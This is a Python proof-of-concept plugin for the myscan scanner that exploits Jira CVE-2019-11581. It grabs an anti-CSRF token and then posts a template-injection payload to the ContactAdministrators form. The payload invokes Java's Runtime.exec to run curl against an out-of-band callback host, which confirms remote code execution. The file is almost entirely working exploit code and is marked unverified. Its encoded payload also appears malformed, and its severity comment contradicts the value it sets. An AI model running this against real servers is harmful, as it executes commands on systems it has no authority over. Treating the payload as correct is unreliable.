#!/usr/bin/env python3
# @Time    : 2020-05-04
# @Author  : caicai
# @File    : poc_jira-cve-2019-11581_2019.py

'''未验证'''

from myscan.lib.parse.response_parser import response_parser
from myscan.config import scan_set
from myscan.lib.core.common_reverse import generate_reverse_payloads, query_reverse
from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
import re
from urllib.parse import quote


class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "jira rce"
        self.vulmsg = "referer: https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html "
        self.level = 3  # 0:Low  1:Medium 2:High

    def verify(self):
        # 根据config.py 配置的深度，限定一下目录深度
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf")
        reverse_url = reverse_url[0].split(" ")[1]
        req = {
            "method": "GET",
            "url": self.url + "secure/ContactAdministrators!default.jspa",
            "allow_redirects": False,
            "verify": False,
            "timeout": 10
        }
        r = request(**req)
        if r != None and r.status_code == 200:
            res = re.search('name="atlassian-token" content="(?P<token>.+?)"', r.text)
            if res:
                token = res.groupdict().get('token')
                req["url"] = self.url + "secure/ContactAdministrators.jspa"
                req["method"] = "POST"
                req[
                    "data"] = "from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%curl+{reverseUrl}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={token}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81".format(
                    reverseUrl=quote(reverse_url), token=token)
                r1 = request(**req)
                if r1 != None and r1.status_code == 302:
                    query_res, query_data = query_reverse(reverse_data)
                    if query_res:
                        parser_ = response_parser(r)
                        self.result.append({
                            "name": self.name,
                            "url": self.url,
                            "level": self.level,  # 0:Low  1:Medium 2:High
                            "detail": {
                                "vulmsg": self.vulmsg,
                                "request": parser_.getrequestraw(),
                                "response": parser_.getresponseraw()
                            }
                        })
